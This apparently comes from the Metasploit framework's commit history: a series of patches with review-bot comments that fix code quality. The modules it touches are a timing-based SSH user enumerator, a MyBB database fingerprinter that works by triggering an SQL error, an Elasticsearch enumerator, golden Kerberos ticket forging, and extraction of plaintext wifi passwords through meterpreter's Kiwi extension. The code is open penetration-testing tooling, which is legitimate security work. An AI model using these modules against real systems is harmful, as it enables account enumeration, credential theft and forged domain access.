rescue ::Timeout::Error + return :success + + rescue Net::SSH::Exception + end + + finish_time = Time.new + + if finish_time - start_time > THRESHOLD + return :success + else + return :fail + end + end + + + def do_report(ip, user, port) + report_auth_info( + :host => ip, + :port => rport, + :sname => 'ssh', + :user => user, + :active => true + ) + end + + + def user_list + return File.new(datastore['USER_FILE']).read.split + end + + + def attempt_user(user, ip) + attempt_num = 0 + ret = nil + + while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) + + if attempt_num > 0 + select(nil, nil, nil, 2**attempt_num) + print_debug "Retrying '#{user}' on '#{ip}' due to connection error" + end + + ret = check_user(ip, user, rport) + attempt_num += 1 + end + return ret + end + + + def show_result(attempt_result, user, ip) + case attempt_result + when :success + print_good "User '#{user}' found on #{ip}" + do_report(ip, user, rport) + :next_user + + when :connection_error + print_error "User '#{user}' on #{ip} could not connect" + :abort + + when :fail + print_debug "User '#{user}' not found on #{ip}" + + end + end + + + def run_host(ip) + print_status "Starting scan on #{ip}" + user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } + end +end From 3a4f983a6f8759c5a6d48bcd788e747ceaff6074 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 28 Mar 2014 22:35:19 +0100 Subject: [PATCH 084/853] Add CVE 2006-5229 reference --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 7aacfd7b99..f8f36d63de 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb 
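Review bot: `user_list` opens the file with `File.new(datastore['USER_FILE']).read.split` and never closes the handle; `File.read(datastore['USER_FILE']).split` returns the same array without leaving a descriptor open. `do_report(ip, user, port)` ignores its `port` argument and reports `rport`, so either pass `:port => port` or drop the parameter. `THRESHOLD = 10` has no comment, although it is compared against `finish_time - start_time`, which is in seconds; something like `# seconds of elapsed time` would document the unit.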
@@ -23,7 +23,10 @@ class Metasploit3 < Msf::Auxiliary This module uses a time-based attack to enumerate users in a OpenSSH server. }, 'Author' => ['kenkeiras'], - 'References' => [], + 'References' => + [ + ['CVE', '2006-5229'] + ], 'License' => MSF_LICENSE ) From b11df0eaf0e095701ba185fc229aaf718b4f02f5 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 28 Mar 2014 16:47:49 -0700 Subject: [PATCH 085/853] Update and rename myBB_GetTypeDB.rb to mybb_get_type_db.rb --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 133 ------------------- modules/auxiliary/gather/mybb_get_type_db.rb | 129 ++++++++++++++++++ 2 files changed, 129 insertions(+), 133 deletions(-) delete mode 100644 modules/auxiliary/gather/myBB_GetTypeDB.rb create mode 100644 modules/auxiliary/gather/mybb_get_type_db.rb diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb deleted file mode 100644 index 46e0a0ad9a..0000000000 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ /dev/null 
@@ -1,133 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -class Metasploit3 < Msf::Auxiliary - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MyBB type database extractor', - 'Description' => %q{ - This module exploits vulnerability in MyBB. - Provide type of database in forum - This affects versions <= 1.6.12 - }, - 'Author' => - [ - # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii ' # Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] - ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Feb 13 2014')) - - register_options( - [ - OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) - ], self.class) - end - - def check - begin - - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end - - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return 
Exploit::CheckCode::Unknown # necessary ???? - end - - #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) - else - _Version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end - - - end - - - - def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") - end - #Resolve response - if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") - elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") - else - print_status("Database MySQL or this is not forum MyBB or unknown Database") - end - - end -end 
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb new file mode 100644 index 0000000000..e20d863f2d --- /dev/null +++ b/modules/auxiliary/gather/mybb_get_type_db.rb 
@@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Determinant Databases MyBB ', + 'Description' => %q{ + Determine the database in the forum. + This affects versions <= 1.6.12 + }, + 'Author' => + [ + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum']) + ], self.class) + end + + def check + begin + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? 
+ end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + + end + + + def run + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + end +end From 3788f136d9aaf371c23772678fce314a3b157f95 Mon Sep 17 00:00:00 2001 
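Review bot: In `check`, the result of `nclient.send_recv(req, 1024)` is dereferenced as `res.code` without a nil test, and the surrounding `rescue RuntimeError` would not catch the resulting NoMethodError, so an unanswered request would likely abort the check instead of returning `Exploit::CheckCode::Unknown`. A guard such as `return Exploit::CheckCode::Unknown if res.nil?` before the status comparison covers that case. The second argument of `send_recv` appears to be a timeout in seconds rather than a byte count, so `1024` looks unintended; `run` already goes through `send_request_raw(..., 25)` and `check` could use the same helper. `'Platform'`, `'Arch'`, `'Targets'` and `'DefaultTarget'` are exploit metadata and look unnecessary in an `Msf::Auxiliary` module.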
From: silascutler Date: Tue, 1 Apr 2014 11:43:15 -0400 Subject: [PATCH 086/853] Update es_enum.rb Updated based on comments. --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index a44eea1cee..0e8735fdc5 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -33,8 +33,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', - 'version' => '1.0', - }, 10) + }) begin json_body = JSON.parse(res.body) @@ -54,8 +53,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Failed to save the result") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable end end end From 1d46e65897a413b8e29737b21cbec0f9fa6dd1f3 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 2 Apr 2014 12:29:35 +1000 Subject: [PATCH 087/853] Update to match meterpreter changes This also includes the ability to specify id and groups for the golden ticket feature. --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 9 ++- .../post/meterpreter/extensions/kiwi/tlv.rb | 72 ++++++++++--------- .../ui/console/command_dispatcher/kiwi.rb | 12 +++- 3 files changed, 55 insertions(+), 38 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 8a5e7f2855..97a7eb635e 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb 
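Review bot: In the first es_enum.rb hunk, `res` from `send_request_raw` goes straight into `JSON.parse(res.body)`, and with the rescue list in the second hunk narrowed to `::Rex::ConnectionRefused, ::Rex::HostUnreachable` a host that accepts the connection but never answers is no longer handled anywhere visible. If `send_request_raw` returns nil on a timeout, as the HttpClient mixin normally does, the parse line raises NoMethodError, which neither rescue clause covers. A guard such as `return if res.nil? || res.body.to_s.empty?` before the `begin` would let the scanner move on to the next host. The method starts and ends outside both hunks, so an existing check further up cannot be ruled out.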
@@ -213,15 +213,22 @@ class Kiwi < Extension # @param domain [String] - Domain name. # @param sid [String] - SID of the domain. # @param tgt [String] - The kerberos ticket granting token. + # @param id [Integer] - ID of the user to grant the token for. + # @param group_ids [Array[Integer]] - IDs of the groups to assign to the user # # Returns [Array[Byte]] # - def golden_ticket_create(user, domain, sid, tgt) + def golden_ticket_create(user, domain, sid, tgt, id = 0, group_ids = []) request = Packet.create_request('kiwi_kerberos_golden_ticket_create') request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user) request.add_tlv(TLV_TYPE_KIWI_GOLD_DOMAIN, domain) request.add_tlv(TLV_TYPE_KIWI_GOLD_SID, sid) request.add_tlv(TLV_TYPE_KIWI_GOLD_TGT, tgt) + request.add_tlv(TLV_TYPE_KIWI_GOLD_USERID, id) + + group_ids.each do |g| + request.add_tlv(TLV_TYPE_KIWI_GOLD_GROUPID, g) + end response = client.send_request(request) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index ed40d8f99e..9c36f0baac 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb 
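Review bot: The two new `@param` lines on `golden_ticket_create` write the type as `Array[Integer]`, while the conventional YARD form is `Array<Integer>`; the existing `Returns [Array[Byte]]` line would read better as `# @return [Array<Byte>]`. The comment should also say what the defaults mean, because the code always sends `id` as `TLV_TYPE_KIWI_GOLD_USERID` (so the default `0` goes on the wire) while an empty `group_ids` sends no group TLV at all. Something like `# @param group_ids [Array<Integer>] - IDs of the groups to assign; none are sent when empty` records that.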
@@ -19,45 +19,47 @@ TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10 TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11) TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12) TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13) +TLV_TYPE_KIWI_GOLD_USERID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 14) +TLV_TYPE_KIWI_GOLD_GROUPID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 15) -TLV_TYPE_KIWI_LSA_VER_MAJ = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 15) -TLV_TYPE_KIWI_LSA_VER_MIN = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 16) -TLV_TYPE_KIWI_LSA_COMPNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 17) -TLV_TYPE_KIWI_LSA_SYSKEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 18) -TLV_TYPE_KIWI_LSA_KEYCOUNT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 19) -TLV_TYPE_KIWI_LSA_KEYID = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 20) -TLV_TYPE_KIWI_LSA_KEYIDX = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 21) -TLV_TYPE_KIWI_LSA_KEYVALUE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 22) -TLV_TYPE_KIWI_LSA_NT6KEY = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 23) -TLV_TYPE_KIWI_LSA_NT5KEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 24) +TLV_TYPE_KIWI_LSA_VER_MAJ = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 20) +TLV_TYPE_KIWI_LSA_VER_MIN = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 21) +TLV_TYPE_KIWI_LSA_COMPNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 22) +TLV_TYPE_KIWI_LSA_SYSKEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 23) +TLV_TYPE_KIWI_LSA_KEYCOUNT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 24) +TLV_TYPE_KIWI_LSA_KEYID = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 25) +TLV_TYPE_KIWI_LSA_KEYIDX = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 26) +TLV_TYPE_KIWI_LSA_KEYVALUE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 27) +TLV_TYPE_KIWI_LSA_NT6KEY = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 28) +TLV_TYPE_KIWI_LSA_NT5KEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 29) -TLV_TYPE_KIWI_LSA_SECRET = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 25) -TLV_TYPE_KIWI_LSA_SECRET_NAME = 
TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 26) -TLV_TYPE_KIWI_LSA_SECRET_SERV = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 27) -TLV_TYPE_KIWI_LSA_SECRET_NTLM = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 28) -TLV_TYPE_KIWI_LSA_SECRET_CURR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 29) -TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 30) -TLV_TYPE_KIWI_LSA_SECRET_OLD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 31) -TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 32) +TLV_TYPE_KIWI_LSA_SECRET = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 35) +TLV_TYPE_KIWI_LSA_SECRET_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 36) +TLV_TYPE_KIWI_LSA_SECRET_SERV = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 37) +TLV_TYPE_KIWI_LSA_SECRET_NTLM = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 38) +TLV_TYPE_KIWI_LSA_SECRET_CURR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 39) +TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 40) +TLV_TYPE_KIWI_LSA_SECRET_OLD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 41) +TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 42) -TLV_TYPE_KIWI_LSA_SAM = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 33) -TLV_TYPE_KIWI_LSA_SAM_RID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 34) -TLV_TYPE_KIWI_LSA_SAM_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 35) -TLV_TYPE_KIWI_LSA_SAM_LMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 36) -TLV_TYPE_KIWI_LSA_SAM_NTLMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 37) +TLV_TYPE_KIWI_LSA_SAM = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 50) +TLV_TYPE_KIWI_LSA_SAM_RID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 51) +TLV_TYPE_KIWI_LSA_SAM_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 52) +TLV_TYPE_KIWI_LSA_SAM_LMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 53) +TLV_TYPE_KIWI_LSA_SAM_NTLMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 54) -TLV_TYPE_KIWI_KERB_EXPORT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 38) -TLV_TYPE_KIWI_KERB_TKT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 39) 
-TLV_TYPE_KIWI_KERB_TKT_ENCTYPE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 40) -TLV_TYPE_KIWI_KERB_TKT_START = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 41) -TLV_TYPE_KIWI_KERB_TKT_END = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 42) -TLV_TYPE_KIWI_KERB_TKT_MAXRENEW = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 43) -TLV_TYPE_KIWI_KERB_TKT_SERVERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 44) -TLV_TYPE_KIWI_KERB_TKT_SERVERREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 45) -TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 46) -TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 47) -TLV_TYPE_KIWI_KERB_TKT_FLAGS = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 48) -TLV_TYPE_KIWI_KERB_TKT_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 49) +TLV_TYPE_KIWI_KERB_EXPORT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 60) +TLV_TYPE_KIWI_KERB_TKT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 61) +TLV_TYPE_KIWI_KERB_TKT_ENCTYPE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 62) +TLV_TYPE_KIWI_KERB_TKT_START = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 63) +TLV_TYPE_KIWI_KERB_TKT_END = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 64) +TLV_TYPE_KIWI_KERB_TKT_MAXRENEW = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 65) +TLV_TYPE_KIWI_KERB_TKT_SERVERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 66) +TLV_TYPE_KIWI_KERB_TKT_SERVERREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 67) +TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 68) +TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 69) +TLV_TYPE_KIWI_KERB_TKT_FLAGS = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 70) +TLV_TYPE_KIWI_KERB_TKT_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 71) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 5af48e04bf..248e174987 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb 
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -143,6 +143,8 @@ class Console::CommandDispatcher::Kiwi @@golden_ticket_create_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner" ], "-u" => [ true, "Name of the user to create the ticket for" ], + "-i" => [ true, "ID of the user to associate the ticket with" ], + "-g" => [ true, "Comma-separated list of group identifiers to include (eg: 501,502)" ], "-d" => [ true, "Name of the target domain" ], "-k" => [ true, "Kerberos ticket granting token" ], "-t" => [ true, "Path of the file to store the ticket in" ], @@ -154,7 +156,7 @@ class Console::CommandDispatcher::Kiwi # def golden_ticket_create_usage print( - "\nUsage: kerberos_ticket_list [-h] -u -d -k -s -t \n\n" + + "\nUsage: kerberos_ticket_list [-h] -u -d -k -s [-i ] [-g -t \n\n" + "Create a golden kerberos ticket that expires in 10 years time.\n\n" + @@golden_ticket_create_opts.usage) end @@ -173,6 +175,8 @@ class Console::CommandDispatcher::Kiwi sid = nil tgt = nil target = nil + id = 0 + group_ids = [] @@golden_ticket_create_opts.parse(args) { |opt, idx, val| case opt @@ -184,6 +188,10 @@ class Console::CommandDispatcher::Kiwi tgt = val when "-t" target = val + when "-i" + id = val.to_i + when "-g" + group_ids = val.split(',').map { |g| g.to_i }.to_a when "-s" sid = val end @@ -195,7 +203,7 @@ class Console::CommandDispatcher::Kiwi return end - ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt) + ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt, id, group_ids) ::File.open( target, 'wb' ) do |f| f.write ticket From e61e5322232536659533f1785dd861d026ac5112 Mon Sep 17 00:00:00 2001 
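Review bot: The usage banner edited in `golden_ticket_create_usage` still begins with `Usage: kerberos_ticket_list`, which is a different command, and the new optional part reads `[-g -t` with no closing bracket as rendered here. The line should name the command this help text belongs to and close the `-g` group before `-t`. In the option parser added further down, `val.split(',').map { |g| g.to_i }.to_a` carries a redundant `.to_a`, since `map` already returns an Array; `val.split(',').map(&:to_i)` is equivalent.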
From: OJ Date: Wed, 2 Apr 2014 17:16:40 +1000 Subject: [PATCH 088/853] Add support for extraction of wifi profile creds --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 44 ++++++++++++++++- .../post/meterpreter/extensions/kiwi/tlv.rb | 8 +++ .../ui/console/command_dispatcher/kiwi.rb | 49 ++++++++++++++++++- 3 files changed, 98 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 97a7eb635e..6f9b6d4282 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/kiwi/tlv' -require 'csv' +require 'rexml/document' module Rex module Post 
@@ -231,8 +231,48 @@ class Kiwi < Extension end response = client.send_request(request) +return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) + end - return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) + # + # List all the wifi interfaces and the profiles associated + # with them. Also show the raw text passwords for each. + # + # Returns [Array[Hash]] + # + def wifi_list + request = Packet.create_request('kiwi_wifi_profile_list') + + response = client.send_request(request) + + results = [] + + response.each(TLV_TYPE_KIWI_WIFI_INT) do |i| + interface = { + :guid => Rex::Text::to_guid(i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_GUID)), + :desc => i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_DESC), + :state => i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_STATE), + :profiles => [] + } + + i.each(TLV_TYPE_KIWI_WIFI_PROFILE) do |p| + + xml = p.get_tlv_value(TLV_TYPE_KIWI_WIFI_PROFILE_XML) + doc = REXML::Document.new(xml) + profile = doc.elements['WLANProfile'] + + interface[:profiles] << { + :name => p.get_tlv_value(TLV_TYPE_KIWI_WIFI_PROFILE_NAME), + :auth => profile.elements['MSM/security/authEncryption/authentication'].text, + :key_type => profile.elements['MSM/security/sharedKey/keyType'].text, + :shared_key => profile.elements['MSM/security/sharedKey/keyMaterial'].text + } + end + + results << interface + end + + return results end # diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 9c36f0baac..ff09f8a0b8 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb 
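Review bot: In `wifi_list`, the three `profile.elements[...].text` lookups assume every profile contains `MSM/security/sharedKey`, but REXML returns nil for an absent path, so a profile without a shared key (or XML without a `WLANProfile` root) raises NoMethodError and aborts the whole listing. The XML arrives from the remote session via `TLV_TYPE_KIWI_WIFI_PROFILE_XML` and should be treated as untrusted input on the console side. A nil-safe lookup, for example `node = profile && profile.elements['MSM/security/sharedKey/keyMaterial']` followed by `node ? node.text : nil`, keeps one unusual profile from discarding the rest.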
